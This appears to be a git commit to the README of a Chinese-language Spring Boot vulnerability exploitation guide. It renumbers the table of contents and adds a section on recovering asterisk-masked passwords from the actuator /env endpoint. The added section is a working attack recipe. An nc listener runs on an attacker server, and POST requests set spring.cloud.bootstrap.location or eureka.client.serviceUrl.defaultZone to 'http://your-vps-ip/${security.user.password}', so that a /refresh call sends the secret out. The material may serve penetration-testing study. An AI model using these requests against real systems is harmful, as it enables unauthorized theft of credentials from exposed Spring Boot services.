Update README.md

LandGrey · LandGrey · commit 8c7a68f36f46 · 2020-05-27T14:47:54.000+08:00
diff --git a/README.md b/README.md
@@ -39,27 +39,34 @@ Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安
         * [步骤五： 解码属性值](#%E6%AD%A5%E9%AA%A4%E4%BA%94-%E8%A7%A3%E7%A0%81%E5%B1%9E%E6%80%A7%E5%80%BC)
       * [漏洞原理：](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1)
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90)
-  * [二：远程代码执行](#%E4%BA%8C%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)
-    * [0x01：whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce)
+    * [0x05：获取被星号脱敏的密码的明文 (方法三)](#0x05%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%B8%89)
       * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-2)
       * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-2)
+        * [步骤一： 找到想要获取的属性名](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%BE%E5%88%B0%E6%83%B3%E8%A6%81%E8%8E%B7%E5%8F%96%E7%9A%84%E5%B1%9E%E6%80%A7%E5%90%8D-2)
+        * [步骤二： 使用 nc 监听 HTTP 请求](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E4%BD%BF%E7%94%A8-nc-%E7%9B%91%E5%90%AC-http-%E8%AF%B7%E6%B1%82-1)
+        * [步骤三： 触发对外 http 请求](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E8%A7%A6%E5%8F%91%E5%AF%B9%E5%A4%96-http-%E8%AF%B7%E6%B1%82)
+        * [步骤四： 刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1)
+  * [二：远程代码执行](#%E4%BA%8C%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)
+    * [0x01：whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)
         * [步骤一：找到一个正常传参处](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%89%BE%E5%88%B0%E4%B8%80%E4%B8%AA%E6%AD%A3%E5%B8%B8%E4%BC%A0%E5%8F%82%E5%A4%84)
         * [步骤二：执行 SpEL 表达式](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%A7%E8%A1%8C-spel-%E8%A1%A8%E8%BE%BE%E5%BC%8F)
       * [漏洞原理：](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-2)
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1)
       * [漏洞环境：](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83)
     * [0x02：spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce)
-      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)
-      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)
         * [步骤一： 托管 yml 和 jar 文件](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%98%E7%AE%A1-yml-%E5%92%8C-jar-%E6%96%87%E4%BB%B6)
         * [步骤二： 设置 spring\.cloud\.bootstrap\.location 属性](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E8%AE%BE%E7%BD%AE-springcloudbootstraplocation-%E5%B1%9E%E6%80%A7)
         * [步骤三： 刷新配置](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
       * [漏洞原理：](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2)
       * [漏洞环境：](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-1)
     * [0x03：eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce)
-      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)
-      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-5)
         * [步骤一：架设响应恶意 XStream payload 的网站](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9E%B6%E8%AE%BE%E5%93%8D%E5%BA%94%E6%81%B6%E6%84%8F-xstream-payload-%E7%9A%84%E7%BD%91%E7%AB%99)
         * [步骤二：监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
         * [步骤三：设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)
@@ -68,8 +75,8 @@ Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)
       * [漏洞环境：](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-2)
     * [0x04：jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce)
-      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)
-      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-5)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-6)
         * [步骤一：查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans)
         * [步骤二：托管 xml 文件](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%98%E7%AE%A1-xml-%E6%96%87%E4%BB%B6)
         * [步骤三：准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
@@ -80,8 +87,8 @@ Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)
       * [漏洞环境：](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-3)
     * [0x05：jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce)
-      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)
-      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-6)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-7)
         * [步骤一：查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans-1)
         * [步骤二：准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
         * [步骤三：架设恶意 rmi 服务](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rmi-%E6%9C%8D%E5%8A%A1)
@@ -90,15 +97,15 @@ Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安
       * [漏洞原理：](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)
     * [0x06：h2 database query RCE](#0x06h2-database-query-rce)
-      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)
-      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-7)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)
         * [步骤一：设置 spring\.datasource\.hikari\.connection\-test\-query 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E8%AE%BE%E7%BD%AE-springdatasourcehikariconnection-test-query-%E5%B1%9E%E6%80%A7)
         * [步骤二：重启应用](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E9%87%8D%E5%90%AF%E5%BA%94%E7%94%A8)
       * [漏洞原理：](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-7)
       * [漏洞分析：](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)
     * [0x07：mysql jdbc deserialization RCE](#0x07mysql-jdbc-deserialization-rce)
-      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)
-      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)
+      * [利用条件：](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-9)
+      * [利用方法：](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-9)
         * [步骤一：查看环境依赖](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E7%8E%AF%E5%A2%83%E4%BE%9D%E8%B5%96)
         * [步骤二：架设恶意 rogue mysql server](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rogue-mysql-server)
         * [步骤三：设置 spring\.datasource\.url 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-springdatasourceurl-%E5%B1%9E%E6%80%A7)
@@ -446,6 +453,109 @@ Authorization: Basic dmFsdWU6MTIzNDU2
 
 
 
+
+
+### 0x05：获取被星号脱敏的密码的明文 (方法三)
+
+> 访问 /env 接口时，spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果
+
+#### 利用条件：
+
+- 通过 POST `/env` 设置属性触发目标对外网指定地址发起任意 http 请求
+- 目标可以请求攻击者的服务器（请求可出外网）
+
+
+
+#### 利用方法：
+
+> 参考 UUUUnotfound 提出的 [issue-1](https://github.com/LandGrey/SpringBootVulExploit/issues/1)，可以在目标发外部 http 请求的过程中，在 url path 中利用占位符带出数据
+
+##### 步骤一： 找到想要获取的属性名
+
+GET 请求目标网站的 `/env` 或 `/actuator/env` 接口，搜索 `******` 关键词，找到想要获取的被星号 * 遮掩的属性值对应的属性名。
+
+
+
+##### 步骤二： 使用 nc 监听 HTTP 请求
+
+在自己控制的外网服务器上监听 80 端口：
+
+```bash
+nc -lvk 80
+```
+
+
+
+##### 步骤三： 触发对外 http 请求
+
+- `spring.cloud.bootstrap.location` 方法（**同时适用于**明文数据中有特殊 url 字符的情况）：
+
+
+
+spring 1.x
+
+```
+POST /env
+Content-Type: application/x-www-form-urlencoded
+
+spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password}
+```
+
+spring 2.x
+
+```
+POST /actuator/env
+Content-Type: application/json
+
+{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}
+```
+
+
+
+- `eureka.client.serviceUrl.defaultZone` 方法（**不适用于**明文数据中有特殊 url 字符的情况）：
+
+
+
+spring 1.x
+
+```
+POST /env
+Content-Type: application/x-www-form-urlencoded
+
+eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}
+```
+
+spring 2.x
+
+```
+POST /actuator/env
+Content-Type: application/json
+
+{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}
+```
+
+
+
+##### 步骤四： 刷新配置
+
+spring 1.x
+
+```
+POST /refresh
+Content-Type: application/x-www-form-urlencoded
+
+```
+
+spring 2.x
+
+```
+POST /actuator/refresh
+Content-Type: application/json
+
+```
+
+
+
 ## 二：远程代码执行
 
 > 由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的，所以有些漏洞名字起的不太正规，以能区分为准
